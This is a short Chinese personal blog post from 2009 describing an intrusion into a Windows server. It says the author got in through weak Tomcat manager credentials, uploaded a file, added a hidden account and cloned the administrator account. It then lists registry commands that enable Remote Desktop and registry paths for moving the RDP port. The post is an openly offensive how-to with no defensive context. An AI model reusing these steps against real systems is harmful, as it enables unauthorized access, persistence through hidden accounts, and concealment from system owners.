Chinaunix首页 | 论坛 | 博客

Baill's Space

首页 |  博文目录 |  关于我

baill

  • 博客访问: 189990
  • 博文数量: 57
  • 博客积分: 1625
  • 博客等级: 上尉
  • 技术积分: 715
  • 用 户 组: 普通用户
  • 注册时间: 2007-07-15 10:55
文章分类

全部博文(57)

文章存档

2012年(2)

2011年(12)

2010年(15)

2009年(19)

2008年(9)

我的朋友
最近访客
推荐博文
相关博文
一例3389入侵

分类: WINDOWS

2009-08-26 23:44:02

使用了tomcat的后台管理弱口令,上传,然后执行命令添加隐藏帐户,并克隆administrator获取系统最高管理权限。
 
REG query  "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections
REG add  "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
 
端口重定义
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\
Terminal Server\Wds\Repwd\Tds\Tcp

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TerminalServer \WinStations 

更改portnumber值

阅读(660) | 评论(0) | 转发(0) |
0

上一篇:windows安全日志-登陆类型

下一篇:统计SQLSERVER数据库数据表存储使用情况

给主人留下些什么吧!~~
关于我们 | 关于IT168 | 联系方式 | 广告合作 | 法律声明 | 免费注册

Copyright 2001-2010 ChinaUnix.net All Rights Reserved 北京皓辰网域网络信息技术有限公司. 版权所有

感谢所有关心和支持过ChinaUnix的朋友们

16024965号-6